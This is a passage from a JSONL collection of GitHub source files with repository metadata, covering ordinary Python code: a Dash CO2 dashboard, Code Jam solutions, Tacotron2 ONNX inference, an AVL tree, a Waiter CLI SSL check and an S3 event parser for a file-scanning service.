grid re init\",e)\n if fix._id != i+1:\n fr = font15.render(\"{:02}\".format(fix._id) ,1, (255,255,0))\n else:\n fr = font15.render(\"{:02}\".format(fix._id) ,1, (100,100,255))\n window.blit(fr,(pos[0]+2,pos[1]+2))\n i += 1\n \n \n #color=window.get_at((70, 70))\n #print(\"pix\",color)\n #surface.set_at((x, y), color)\n\n #from pygame import gfxdraw\n #gfxdraw.pixel(surface, x, y, color)\n \n pointer.draw()\n pygame.display.flip()\n pg.time.wait(30)\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"micox4356/LibreLight","sub_path":"vpu/vpu2_live.py","file_name":"vpu2_live.py","file_ext":"py","file_size_in_byte":21303,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"70171736836","text":"import dash\nfrom dash import html, dcc, Input, Output, callback\nimport dash_bootstrap_components as dbc\nimport plotly.express as px\nfrom download_data import co2_data_countries, codebook\nimport utils as u\n\ndash.register_page(__name__, order=2)\n\n# Palette:\n# #002B36 - dark blue\n# #A4C9D7 - light blue\n# #D07C2E - orange\n# #F1F1E6 - gray\n\n# Build sidebar\ncompare_sidebar_style = \\\n {\n \"position\": \"relative\",\n \"top\": 0,\n \"left\": 0,\n \"bottom\": 0,\n \"padding\": \"1rem 1rem\",\n #\"background-color\": \"#002b36\",\n #\"color\": \"#D07C2E\",\n }\n\ncompare_sidebar = \\\n dbc.Container(\n [\n html.H2(\"Filters\"),\n html.Hr(),\n dbc.Nav(\n [\n html.P(\n 
\"Countries\", className=\"lead\"\n ),\n dcc.Dropdown(\n co2_data_countries.country.unique(),\n co2_data_countries.country.unique()[0],\n id='compare-country-selector',\n placeholder='Select one or more countries...',\n multi=True\n ),\n html.P(children=\"\", id='compare-country-error-display',\n style={'font-weight': 'bold', 'font-style': 'italics'}),\n html.P(\n \"Dataset\", className=\"lead\"\n ),\n dcc.Dropdown(\n co2_data_countries.loc[:, ~co2_data_countries.columns.isin(\n ['country', 'year', 'iso_code'])].columns,\n 'co2',\n id='compare-dataset-selector',\n placeholder='Select a dataset to plot...'\n ),\n html.P(children=\"\", style={'font-weight': 'bold', 'font-style': 'italics'},\n id='compare-dataset-error-display'),\n html.A(\"Dataset definitions\",\n href='https://github.com/owid/co2-data/blob/master/owid-co2-codebook.csv',\n target=\"_blank\")\n ],\n vertical=True,\n pills=True\n ),\n ],\n style=compare_sidebar_style,\n fluid=True\n )\n\nlayout = dbc.Container(\n [\n dbc.Row(\n [\n dbc.Col(\n dbc.Card(\n dbc.CardBody(\n compare_sidebar, style={'margin-left': '-20px', 'margin-right': '-20px'}\n )\n ),\n width=3\n ),\n dbc.Col(\n [\n html.H2(style={'textAlign': 'left', 'margin-left': '7px', 'margin-top': '1rem',\n 'color': '#D07C2E', 'font-weight': 'bold'},\n children='Compare'),\n html.P(style={'textAlign': 'left', 'margin-left': '7px', 'margin-top': '7px',\n 'color': '#D07C2E', 'font-style': 'italics'},\n children=\n '''\n Compare countries' GHG emission trajectories over time\n '''),\n html.Hr(),\n dcc.Graph(\n id='compare-timeseries-plot',\n ),\n dcc.RangeSlider(\n co2_data_countries['year'].min(),\n co2_data_countries['year'].max(),\n step=None,\n value=[co2_data_countries['year'].max() - 20, co2_data_countries['year'].max()],\n marks={str(year): str(year) for year in co2_data_countries['year'].unique()\n if year % 10 == 0},\n allowCross=True,\n included=True,\n id='compare-year-slider'\n ),\n html.A(id='compare-dataset-explainer')\n ]\n )\n ]\n )\n ],\n fluid=True,\n class_name=\"g-0\"\n)\n\n\n@callback(\n Output('compare-timeseries-plot', 'figure'),\n Output('compare-country-error-display', 'children'),\n Output('compare-dataset-error-display', 'children'),\n Output('compare-dataset-explainer', 'children'),\n Input('compare-year-slider', 'value'),\n Input('compare-country-selector', 'value'),\n Input('compare-dataset-selector', 'value'))\ndef update_timeseries_plot(year_range, country_value, dataset_value):\n # check if more than one country has been passed\n if isinstance(country_value, list):\n # if country-selector value is a list, there is more than one country selected, then .isin() should be used\n selected_country_df = co2_data_countries[co2_data_countries['country'].isin(country_value)]\n else:\n # if it's not a list, only one country is selected, which means we should use boolean comparison to select\n selected_country_df = co2_data_countries[co2_data_countries['country'] == country_value]\n\n # check if no countries provided, return an error and don't update dashboard\n if not country_value:\n return dash.no_update, html.P(f'Please select one or more countries.', style={\n 'font-weight': 'bold', 'font-style': 'italics', 'color': '#D07C2E'}), dash.no_update, dash.no_update\n\n # check if no dataset selected, return an error and don't update dashboard\n if not dataset_value:\n return dash.no_update, dash.no_update, html.P(f'Please select a dataset.', style={\n 'font-weight': 'bold', 'font-style': 'italics', 'color': '#D07C2E'}), dash.no_update\n\n # use the utils 
function to find the dataset for only the selected countries and years\n df = u.find_country_range_data(selected_country_df, dataset_value, country_value, year_range[0], year_range[1])\n\n # define the parameters of the line plot and update the data\n fig = px.line(df, x='year', y=df.columns)\n \n fig.update_xaxes(\n title_text='Year',\n title_standoff=25,\n showgrid=True, gridcolor='#1e434a', tickfont=dict(color='#839496'), title_font=dict(color='#839496')\n )\n fig.update_yaxes(\n title_text=f\"{dataset_value} *\",\n title_standoff=25,\n showgrid=True, gridcolor='#1e434a', tickfont=dict(color='#839496'), title_font=dict(color='#839496')\n )\n fig.update_layout(transition_duration=100, plot_bgcolor= \"#002b36\", paper_bgcolor=\"#1e434a\", \n legend=dict(title_font=dict(color='#839496'),font=dict(color='#839496')))\n\n # access codebook for full description of selected dataset to be updated under scatter plot\n dataset_codebook_description = codebook.loc[codebook['column'] == dataset_value]['description'].values[0]\n dataset_def = f\"* {dataset_value}: {dataset_codebook_description}\"\n\n return fig, None, None, dataset_def\n\n","repo_name":"cedrichille/historical-co2-data","sub_path":"pages/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":7129,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23415456351","text":"import sys\n\nif __name__ == '__main__':\n f = sys.stdin\n if len(sys.argv) >= 2:\n fn = sys.argv[1]\n if fn != '-':\n f = open(fn)\n output = open('jam1.out', 'w')\n t = int(f.readline())\n for test in xrange(1, t+1):\n str1 = \"Case #%d: \" %(test)\n output.write(str1)\n x = int(f.readline())\n arr1 = []\n for i in range(4):\n line = map(int, f.readline().split())\n arr1.append(line)\n y = int(f.readline())\n arr2 = []\n for j in range(4):\n line = map(int, f.readline().split())\n arr2.append(line)\n cnt = 0\n ans = -1\n for i in range(4):\n for j in range(4):\n if arr1[x-1][i] == arr2[y-1][j]:\n ans = arr1[x-1][i]\n cnt += 1\n if cnt == 0:\n output.write(\"Volunteer cheated!\\n\")\n elif cnt == 1:\n output.write(str(ans) + \"\\n\")\n else:\n output.write(\"Bad magician!\\n\")\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/3002.py","file_name":"3002.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42713782596","text":"from collections import deque\n\n\ndef rotate90(key):\n copied = key[:]\n copied.reverse()\n return list(map(list, zip(*copied)))\n\n\ndef size_up(key, n):\n m = len(key)\n if n == m:\n return key\n\n diff = n-m\n new_key = []\n added_row = [0 for _ in range(diff)]\n for row in key:\n new_key.append(row + added_row)\n\n zero_row = [0 for _ in range(n)]\n for i in range(diff):\n new_key.append(zero_row)\n\n return new_key\n\n\ndef move_up(key):\n n = len(key)\n new_key = []\n for i in range(1, n):\n new_key.append(key[i])\n new_key.append([0 for i in range(n)])\n return new_key\n\n\ndef move_down(key):\n n = len(key)\n new_key = []\n new_key.append([0 for i in range(n)])\n for i in range(n-1):\n new_key.append(key[i])\n\n return new_key\n\n\ndef move_right(key):\n n = len(key)\n new_key = []\n for row in key:\n new_key.append([0]+row[:n-1])\n return new_key\n\n\ndef move_left(key):\n n = len(key)\n new_key = []\n for row in key:\n new_key.append(row[1:]+[0])\n return new_key\n\n\ndef is_matched(key, lock):\n '''\n print(\"is 
matched\")\n for i in range(len(key)):\n print(key[i], \" \", lock[i])\n '''\n n = len(key)\n for i in range(n):\n for j in range(n):\n if key[i][j] == lock[i][j]:\n return False\n return True\n\n\n# l,u / l,d / r,u / r,d\ndef simulate(key, lock, left_or_right, up_or_down):\n n = len(lock)\n visit = [[[False for _ in range(n+1)]\n for __ in range(n+1)] for _____ in range(4)]\n\n q = deque()\n rotated_key1 = rotate90(key)\n rotated_key2 = rotate90(rotated_key1)\n rotated_key3 = rotate90(rotated_key2)\n\n q.append((key, 0, 0, 0))\n q.append((rotated_key1, 1, 0, 0))\n q.append((rotated_key2, 2, 0, 0))\n q.append((rotated_key3, 3, 0, 0))\n\n while len(q) > 0:\n (current_key, rotate_count, lr, ud) = q.popleft()\n\n if lr > n or ud > n:\n continue\n\n if visit[rotate_count][lr][ud]:\n continue\n\n visit[rotate_count][lr][ud] = True\n\n if is_matched(current_key, lock):\n return True\n\n if left_or_right == 'left':\n q.append((move_left(current_key), rotate_count, lr+1, ud))\n else:\n q.append((move_right(current_key), rotate_count, lr+1, ud))\n\n if up_or_down == 'up':\n q.append((move_up(current_key), rotate_count, lr, ud+1))\n else:\n q.append((move_down(current_key), rotate_count, lr, ud+1))\n\n return False\n\n\ndef solution(key, lock):\n\n key = size_up(key, len(lock))\n\n # l,u / l,d / r,u / r,d\n if simulate(key, lock, 'left', 'up'):\n return True\n if simulate(key, lock, 'left', 'down'):\n return True\n if simulate(key, lock, 'right', 'up'):\n return True\n if simulate(key, lock, 'right', 'down'):\n return True\n\n return False\n\n\nkey = [[1, 1, 1, 1], [2, 1, 1, 1], [3, 1, 1, 1], [4, 1, 1, 1]]\nlock = [[1, 1, 1, 1], [1, 1, 1, 1], [1, 1, 1, 1], [1, 1, 1, 0]]\n\nprint(solution(key, lock))\n","repo_name":"SJ0000/PS","sub_path":"Programmers/60059.py","file_name":"60059.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13692682698","text":"import onnx\nimport onnxruntime\nimport numpy as np\nfrom scipy.io import wavfile\nfrom text import text_to_sequence\n\nnp.set_printoptions(threshold=np.inf)\n\ndef encoder_infer(input_data, encoder_model):\n session = onnxruntime.InferenceSession(encoder_model.SerializeToString())\n sequences = session.get_inputs()[0].name\n sequence_lengths = session.get_inputs()[1].name\n print(\"input_name_1: \", sequences)\n print(\"input_name_2: \", sequence_lengths)\n outputs = session.run([\"memory\", \"processed_memory\", \"lens\"],{sequences:input_data[0], sequence_lengths:input_data[1]})\n return outputs\n\ndef decoder_infer(decoder_inputs, decoder_model):\n session = onnxruntime.InferenceSession(decoder_model.SerializeToString())\n # 1. decoder_input\n # 2. attention_hidden\n # 3. attention_cell\n # 4. decoder_hidden\n # 5. decoder_cell\n # 6. attention_weights\n # 7. attention_weights_cum\n # 8. attention_context\n # 9. memory\n # 10. processed_memory\n # 11. 
mask\n input_names = []\n for input in session.get_inputs():\n input_names.append(input.name)\n\n output_names = []\n for output in session.get_outputs():\n output_names.append(output.name)\n\n # print(\"output names: \", output_names)\n\n inputs_dict = {}\n for i in range(11):\n inputs_dict[input_names[i]] = decoder_inputs[i]\n\n decoder_outputs = session.run([], inputs_dict)\n\n return decoder_outputs\n\ndef decoder_iter_infer(decoder_inputs, decoder_model, threshold = 0.5):\n count = 0\n mel_counts = [0] * decoder_inputs[0].shape[0]\n\n outputs = 0\n\n decoder_predicts = []\n\n gate_ones = np.ones(decoder_input.shape[0])\n\n while True:\n outputs = decoder_infer(decoder_inputs, decoder_model)\n assert(len(outputs) == 9)\n decoder_predicts.append(outputs[0])\n\n decoder_inputs[0] = outputs[0]\n for i in range(1, 8):\n decoder_inputs[i] = outputs[i + 1]\n\n gate = outputs[1]\n\n gate = 1/(1+np.exp(-gate)).flatten()\n\n gate = (gate < threshold).astype(np.int)\n gate_temp = gate_ones\n gate_ones = gate_ones * gate\n\n for i in range(len(gate_temp)):\n if gate_temp[i] == 1 and gate_ones[i] == 0:\n mel_counts[i] = count\n\n count += 1\n\n print(\"iter times : \", count)\n print(\"gate : \", gate_ones)\n print(\"The {} times gate is : {}\".format(count, gate_ones))\n\n if gate_ones.sum() == 0:\n break\n\n return decoder_predicts, mel_counts\n\ndef postnet_infer(postnet_inputs, postnet_model):\n session = onnxruntime.InferenceSession(postnet_model.SerializeToString())\n mel_outputs = session.get_inputs()[0].name\n\n postnet_outputs = session.run([],{mel_outputs:postnet_inputs})\n return postnet_outputs\n\ndef waveglow_infer(waveglow_inputs, postnet_model):\n session = onnxruntime.InferenceSession(postnet_model.SerializeToString())\n mel = session.get_inputs()[0].name\n z = session.get_inputs()[1].name\n\n waveglow_outputs = session.run([], {mel : waveglow_inputs[0], z : waveglow_inputs[1]})\n return waveglow_outputs\n\ndef save_wav(wav, path, sr):\n wav = np.array(wav).astype(np.float)\n wav *= 32767 / max(0.01, np.max(np.abs(wav)))\n wavfile.write(path, sr, wav.astype(np.int16))\n\ndef file_to_audio(audio_data, mel_len):\n sampling_rate = 22050\n result = audio_data.astype(np.float32)\n if mel_len > 0:\n # Cut to real mel_len.\n # For example, prediction report \"60 gate = 0.998607\" as latest, mel_len is 60\n result = result[0 : mel_len * 8 * 32]\n if len(result) > 0:\n save_wav(result, \"tacotron2_onnx_models/mtn_test_batch8_process.wav\", sampling_rate)\n\ndef change_model_input_batch(batch, model):\n names_to_change_list = [\"sequences\", \"sequence_lengths\",\n \"decoder_input\", \"attention_hidden\", \"attention_cell\", \"decoder_hidden\",\n \"decoder_cell\", \"attention_weights\", \"attention_weights_cum\", \"attention_context\",\n \"memory\", \"processed_memory\", \"mask\",\n \"mel_outputs\"\n ]\n for input in model.graph.input:\n if input.name in names_to_change_list:\n dim_proto0 = input.type.tensor_type.shape.dim[0]\n dim_proto0.dim_value = batch\n\ndef change_model_output_batch(batch, model):\n names_to_change_list = [\"memory\", \"processed_memory\", \"lens\",\n \"decoder_output\", \"gate_prediction\", \"out_attention_hidden\", \"out_attention_cell\",\n \"out_decoder_hidden\", \"out_decoder_cell\", \"out_attention_weights\",\n \"out_attention_weights_cum\", \"out_attention_context\",\n \"mel_outputs_postnet\"\n ]\n for output in model.graph.output:\n if output.name in names_to_change_list:\n dim_proto0 = output.type.tensor_type.shape.dim[0]\n dim_proto0.dim_value = batch\n\nif 
__name__ == \"__main__\":\n # ============================= step 1 : input prepare ===============================\n words_index = []\n\n text = [\"Bi Ren Technology is China's greatest chip company .\",\n \"Responsibility excellance collaboration innovation pragmatism empowering\",\n \"No boundaries, no challenges, pursuit excellence and Dare to be first\",\n \"Printing, in the only sense with which we are at present concerned\",\n \"differs from most if not from all the arts and crafts represented in the Exhibition\",\n \"in being comparatively modern.\",\n \"produced the block books, which were the immediate predecessors of the true printed book\",\n \"And it is worth mention in passing that, as an example of fine typography\"\n ]\n\n for sentence in text:\n word_index_temp = text_to_sequence(sentence, ['english_cleaners'])\n words_index.append(word_index_temp)\n\n sentence_len = [len(item) for item in words_index]\n seq_len = max(sentence_len)\n\n for word_index in words_index:\n if len(word_index) < seq_len:\n word_index.extend([0]*(seq_len-len(word_index)))\n\n decoder_mask = []\n for length in sentence_len:\n mask_data = [0]*length + [1]*(seq_len - length)\n decoder_mask.append(mask_data)\n\n # root_path = \"/home/mtn/suinfer_temp/\"\n root_path = \"/home/mtn/Projects/Onnx_process/tacotron2_onnx_models/\"\n\n encoder_path = root_path + \"encoder.onnx\"\n decoder_path = root_path + \"decoder_iter.onnx\"\n postnet_path = root_path + \"postnet.onnx\"\n waveglow_path = root_path + \"waveglow.onnx\"\n\n # =============================step 2 : infer encoder ================================\n batch = len(words_index)\n\n encoder_model = onnx.load(encoder_path)\n\n change_model_input_batch(batch, encoder_model)\n change_model_output_batch(batch, encoder_model)\n\n sequence_data = np.array(words_index).astype(np.int64) # input1\n # sequence_lengths_data = np.array([seq_len] * batch).astype(np.int64) #input2\n sequence_lengths_data = np.array(sentence_len).astype(np.int64) #input2\n encoder_outputs = encoder_infer([sequence_data, sequence_lengths_data], encoder_model) # infer\n\n # =============================step 3 : infer decoder ==========================\n\n decoder_model = onnx.load(decoder_path)\n\n change_model_input_batch(batch, decoder_model)\n change_model_output_batch(batch, decoder_model)\n\n decoder_inputs = []\n\n # input 1\n decoder_input = np.array([0]*batch*80).astype(np.float16).reshape((batch, 80))\n decoder_inputs.append(decoder_input)\n # input 2\n attention_hidden = np.array([0]*batch*1024).astype(np.float16).reshape((batch, 1024))\n decoder_inputs.append(attention_hidden)\n # input 3\n attention_cell = np.array([0]*batch*1024).astype(np.float16).reshape((batch, 1024))\n decoder_inputs.append(attention_cell)\n # input 4\n decoder_hidden = np.array([0]*batch*1024).astype(np.float16).reshape((batch, 1024))\n decoder_inputs.append(decoder_hidden)\n # input 5\n decoder_cell = np.array([0]*batch*1024).astype(np.float16).reshape((batch, 1024))\n decoder_inputs.append(decoder_cell)\n # input 6\n attention_weights = np.array([0]*batch*seq_len).astype(np.float16).reshape((batch, seq_len))\n decoder_inputs.append(attention_weights)\n # input 7\n attention_weights_cum = np.array([0]*batch*seq_len).astype(np.float16).reshape((batch, seq_len))\n decoder_inputs.append(attention_weights_cum)\n # input 8\n attention_context = np.array([0]*batch*512).astype(np.float16).reshape((batch, 512))\n decoder_inputs.append(attention_context)\n # input 9\n memory = encoder_outputs[0] # form 
encpder:memory --> (batch, seq, 512)\n decoder_inputs.append(memory)\n # input 10\n processed_memory = encoder_outputs[1] # from encoder: processed_memory --> (batch, seq, 128)\n decoder_inputs.append(processed_memory)\n # input 11\n mask = np.array(decoder_mask).astype(np.bool)\n decoder_inputs.append(mask)\n\n # decoder inference\n decoder_outputs, mel_lens = decoder_iter_infer(decoder_inputs, decoder_model) # (batch, 80, mel_len) : mel_len is random\n\n decoder_outputs_unsequence = []\n for item in decoder_outputs:\n decoder_outputs_unsequence.append(item.reshape(batch, 80, 1))\n\n mel_outputs = np.concatenate(decoder_outputs_unsequence, axis=2)\n\n # ================================step 4 : infer postnet =================================\n\n postnet_model = onnx.load(postnet_path)\n\n change_model_input_batch(batch, postnet_model)\n change_model_output_batch(batch, postnet_model)\n\n postnet_outputs = postnet_infer(mel_outputs, postnet_model)\n\n # print(postnet_outputs[0].shape)\n\n # ================================= step 5 : infer waveglow ================================\n\n waveglow_model = onnx.load(waveglow_path)\n\n\n change_model_input_batch(batch, postnet_model)\n change_model_output_batch(batch, postnet_model)\n\n mel_size = postnet_outputs[0].shape[2] # 367\n stride = 256\n n_group = 8\n z_size = mel_size * stride # 367 * 256\n z_size = z_size // n_group # 367 * 256 / 32\n z = np.random.randn(batch, n_group, z_size).astype(np.float16)\n\n waveglow_outputs = waveglow_infer([postnet_outputs[0], z], waveglow_model)\n\n # ================================== step 6 : save to .wav ==================================\n mels_data = []\n for i in range(batch):\n mel_data = waveglow_outputs[0][i].flatten()\n mel_len = mel_lens[i]\n valid_mel_data = mel_data[0 : mel_len * 256]\n mels_data.extend(valid_mel_data.tolist())\n\n final_data = np.array(mels_data)\n file_to_audio(final_data, 0)\n\n","repo_name":"Elvin-Ma/Onnx_Demo","sub_path":"tacotron_infer_batch.py","file_name":"tacotron_infer_batch.py","file_ext":"py","file_size_in_byte":10231,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"12072038267","text":"\nfrom waiter.action import check_ssl\nfrom waiter.util import check_positive, print_error\n\n\ndef ensureSSL(_, args, __, ___):\n \"\"\"Checks the state of SSL for the provided token.\"\"\"\n port=443\n token_name = args.get('token')\n timeout_secs = args.get('timeout', None)\n try:\n check_ssl(token_name, port, timeout_secs)\n # Any exception indicates an issue connecting to or handshaking the backend service\n except Exception as e:\n print_error(e)\n print_error(f'Connection to {token_name}:{port} failed')\n return 1\n return 0\n\n\ndef register(add_parser):\n \"\"\"Adds this sub-command's parser and returns the action function\"\"\"\n default_timeout = 300\n parser = add_parser('ensure-ssl', help='checks if the specified token has SSL set up')\n parser.add_argument('token')\n parser.add_argument('--timeout', '-t', help=f'read timeout (in seconds) for SSL verification request (default is '\n f'{default_timeout} seconds)',\n type=check_positive, default=default_timeout)\n return ensureSSL\n","repo_name":"twosigma/waiter","sub_path":"cli/waiter/subcommands/ssl.py","file_name":"ssl.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"61"} +{"seq_id":"23544299281","text":"#!/usr/bin/python\n\nimport queue\n\ndef solution(S, K):\n 
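# greedy, left to right: the leftmost '-' can only be fixed by flipping the K-sized window starting on it, so every flip below is forced\n 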
sequence = [c == '+' for c in S]\n result = 0\n\n for i in range(len(sequence)):\n if not sequence[i]:\n if i + K > len(S):\n return 'IMPOSSIBLE'\n else:\n #Flip\n for j in range(K):\n sequence[i+j] = not sequence[i+j]\n result += 1\n\n return str(result)\n\ndef main():\n T = int(input())\n for t in range(1, T +1):\n S, K = input().split(' ')\n result = solution(S, int(K))\n print('Case #{}: {}'.format(t, result))\n\nif __name__ == '__main__':\n main()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/2725.py","file_name":"2725.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5790799626","text":"import os\n\nimport geopandas as gpd\n\nfrom odysseus.city_data_manager.city_data_source.geo_data_source.geo_data_source import GeoDataSource\n\n\nclass CalgaryHexagonalGrid(GeoDataSource):\n\n def __init__(self):\n super().__init__(\"Calgary\", \"city_of_calgary\")\n\n def load_raw(self):\n raw_geo_data_path = os.path.join(\n self.raw_data_path,\n \"geo_export_edc5528d-f07e-4fd8-9622-be91c874918c.dbf\"\n )\n self.gdf = gpd.read_file(raw_geo_data_path)\n return self.gdf\n\n def normalise(self):\n self.gdf_norm = self.gdf\n self.gdf_norm = self.gdf_norm[[\n \"grid_id\", \"geometry\"\n ]]\n\n self.gdf_norm.to_file(\n os.path.join(\n self.norm_data_path,\n \"hexagonal_grid.shp\"\n )\n )\n return self.gdf_norm\n","repo_name":"smartdatapolito/odysseus","sub_path":"odysseus/city_data_manager/city_data_source/geo_data_source/calgary_hexagonal_grid.py","file_name":"calgary_hexagonal_grid.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"6500079996","text":"class BinaryTree:\n def __init__(self):\n self.root = None\n \n def __iter__(self):\n # in-order traversal of the tree's elements\n if self.root:\n return self.root.inorder()\n\n def add(self, value):\n # insert the value at the proper position in the binary tree\n if self.root is None:\n self.root = BinaryNode(value)\n else:\n self.root = self.root.add(value)\n\nclass BinaryNode:\n def __init__(self, value = None):\n # create a binary node\n self.value = value\n self.left = None\n self.right = None\n self.height = 0\n \n def inorder(self):\n # in-order traversal of the tree rooted at this node\n if self.left:\n for n in self.left.inorder():\n yield n\n\n yield self.value\n\n if self.right:\n for n in self.right.inorder():\n yield n\n\n def computeHeight(self):\n # compute this node's height in the BST from its children\n height = -1\n if self.left:\n height = max(height, self.left.height)\n if self.right:\n height = max(height, self.right.height)\n self.height = height + 1\n \n def heightDifference(self):\n # compute the height difference between this node's children\n leftTarget = 0\n rightTarget = 0\n if self.left:\n leftTarget = 1 + self.left.height\n if self.right:\n rightTarget = 1 + self.right.height\n return leftTarget - rightTarget\n \n def add(self, val):\n # add a new node to the BST, with whatever rebalancing the value requires\n newRoot = self\n if val <= self.value:\n self.left = self.addToSubTree(self.left, val)\n if self.heightDifference() == 2:\n if val <= self.left.value:\n newRoot = self.rotateRight()\n else:\n newRoot = self.rotateLeftRight()\n else:\n self.right = self.addToSubTree(self.right, val)\n if self.heightDifference() == -2:\n if val > self.right.value:\n newRoot = self.rotateLeft()\n else:\n newRoot = self.rotateRightLeft()\n newRoot.computeHeight()\n return newRoot\n \n def addToSubTree(self, parent, val):\n # add val to the parent's subtree (if it exists); return its root, which may change after a rotation\n if parent is None:\n return BinaryNode(val)\n parent = parent.add(val)\n return parent\n \n def rotateRight(self):\n # perform a right rotation around this node\n newRoot = self.left\n grandson = newRoot.right\n self.left = grandson\n newRoot.right = self\n\n self.computeHeight()\n return newRoot\n\n def rotateRightLeft(self):\n # perform a right rotation followed by a left rotation around this node\n child = self.right\n newRoot = child.left\n grand1 = newRoot.left\n grand2 = newRoot.right\n child.left = grand2\n self.right = grand1\n\n newRoot.left = self\n newRoot.right = child\n\n child.computeHeight()\n self.computeHeight()\n return newRoot\n \n def rotateLeft(self):\n # perform a left rotation around this node\n newRoot = self.right\n grandson = newRoot.left\n self.right = grandson\n newRoot.left = self\n \n self.computeHeight()\n return newRoot\n \n def rotateLeftRight(self):\n # perform a left rotation followed by a right rotation around this node\n child = self.left\n newRoot = child.right\n grand1 = newRoot.left\n grand2 = newRoot.right\n child.right = grand1\n self.left = grand2\n newRoot.left = child\n newRoot.right = self\n\n child.computeHeight()\n self.computeHeight()\n return newRoot\n\n def removeFromParent(self, parent, val):\n # helper for removal; ensures proper behavior when removing a node that has children\n if parent:\n return parent.remove(val)\n return None\n \n def remove(self, val):\n # remove val from the binary tree; works together with a remove method on the tree\n newRoot = self\n if val == self.value:\n if self.left is None:\n return self.right\n \n child = self.left\n while child.right:\n child = child.right\n\n childKey = child.value\n self.left = self.removeFromParent(self.left, childKey)\n self.value = childKey\n\n if self.heightDifference() == -2:\n if self.right.heightDifference() <= 0:\n newRoot = self.rotateLeft()\n else:\n newRoot = self.rotateRightLeft()\n elif val < self.value:\n self.left = self.removeFromParent(self.left, val)\n if self.heightDifference() == -2:\n if self.right.heightDifference() <= 0:\n newRoot = self.rotateLeft()\n else:\n newRoot = self.rotateRightLeft()\n else:\n self.right = self.removeFromParent(self.right, val)\n if self.heightDifference() == 2:\n if self.left.heightDifference() >= 0:\n newRoot = self.rotateRight()\n else:\n newRoot = self.rotateLeftRight()\n \n newRoot.computeHeight()\n return newRoot\n\nbt = BinaryTree()\nfor i in range(7, 0, -1):\n bt.add(i)\n\nfor v in bt:\n print(v)","repo_name":"Sapphire0912/Programming","sub_path":"Python/Practice/Algorithm/Search/BST.py","file_name":"BST.py","file_ext":"py","file_size_in_byte":5591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"590539913","text":"import re\nimport json\nimport urllib\nimport dateutil\nfrom dao.conf import UNPROCESSED_BUCKET\n\n\nclass InvalidEventError(Exception):\n pass\n\n\nclass InvalidEventDataError(InvalidEventError):\n pass\n\n\nclass MissingEventFieldError(InvalidEventError):\n pass\n\n\nclass InvalidKeyFormat(InvalidEventError):\n pass\n\n\ndef loads(text):\n try:\n return json.loads(text)['Records'][0]\n except ValueError as e:\n raise InvalidEventDataError('Not a valid JSON') from e\n except KeyError as e:\n raise MissingEventFieldError(str(e)) from e\n except IndexError as e:\n raise InvalidEventDataError('Empty Records list') from e\n\n\ndef loads_s3_object_created_event(text):\n event = loads(text)\n try:\n if not event['eventName'].startswith('ObjectCreated:'):\n raise InvalidEventError()\n event['s3'] # checking that key exists\n obj = event['s3']['object']\n obj['key'] = urllib.parse.unquote(obj['key'])\n return event\n except KeyError as e:\n raise MissingEventFieldError(str(e)) from e\n\n\ndef parse_unprocessed_file_key(key):\n\n key_pattern = 
r'^([^\\/\\s]+)\\/(([^\\/\\s]+)\\/)*([^\\/\\s]+)\\.(\\w+)$'\n # try to use legacy format, without upload hash\n match = re.match(key_pattern, key)\n if not match:\n raise InvalidKeyFormat('Key does not match expected format')\n\n submission_guid = match.group(1)\n try:\n filename = match.group(4)\n except ValueError as e:\n raise InvalidKeyFormat('Key does not match expected format') from e\n try:\n file_ext = match.group(5)\n except IndexError:\n file_ext = ''\n\n return submission_guid, filename, file_ext\n\n\ndef loads_s3_unprocessed_bucket_object_created_event(text):\n event = loads_s3_object_created_event(text)\n try:\n\n s3 = event['s3']\n bucket = s3['bucket']['name']\n key = s3['object']['key']\n\n if bucket != UNPROCESSED_BUCKET:\n raise InvalidEventError(\n 'Invalid bucket. Expected:{}. Got:{}.'.format(\n UNPROCESSED_BUCKET,\n bucket\n )\n )\n parse_unprocessed_file_key(key)\n return event\n except KeyError as e:\n raise MissingEventFieldError(str(e)) from e\n\n\ndef create_minimal_valid_file_put_event(\n key=None,\n etag=None,\n size=None,\n bucket=None,\n event_time=None,\n):\n event_json = {\n \"Records\": [\n {\n \"eventTime\": event_time.isoformat(),\n \"eventName\": \"ObjectCreated:Put\",\n \"s3\": {\n \"bucket\": {\n \"name\": bucket\n },\n \"object\": {\n \"key\": key,\n \"size\": size,\n \"eTag\": etag,\n }\n }\n }\n ]\n }\n return json.dumps(event_json)\n","repo_name":"hamlet-io/avscanner","sub_path":"src/processor/common/event/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39499584931","text":"# coding: utf-8\nfrom scipy.stats import norm\nnorm.pdf(0)\nnorm.pdf(0, loc=5, scale=10)\nimport numpy as np\nr = np.random.randn(10)\nnorm.pdf(r)\n# Joint probability vs. log of joint probability of data samples (+ faster than *)\n# Log of Gaussian PDF (much faster since no exponential!)\nnorm.logpdf(r)\nnorm.cdf(r)\nnorm.logcdf(r)\n","repo_name":"jwyx3/ML","sub_path":"numpy_stack/scipy_1.py","file_name":"scipy_1.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40996169115","text":"\"\"\"\nvalidar = list()\nval1 = val2 = 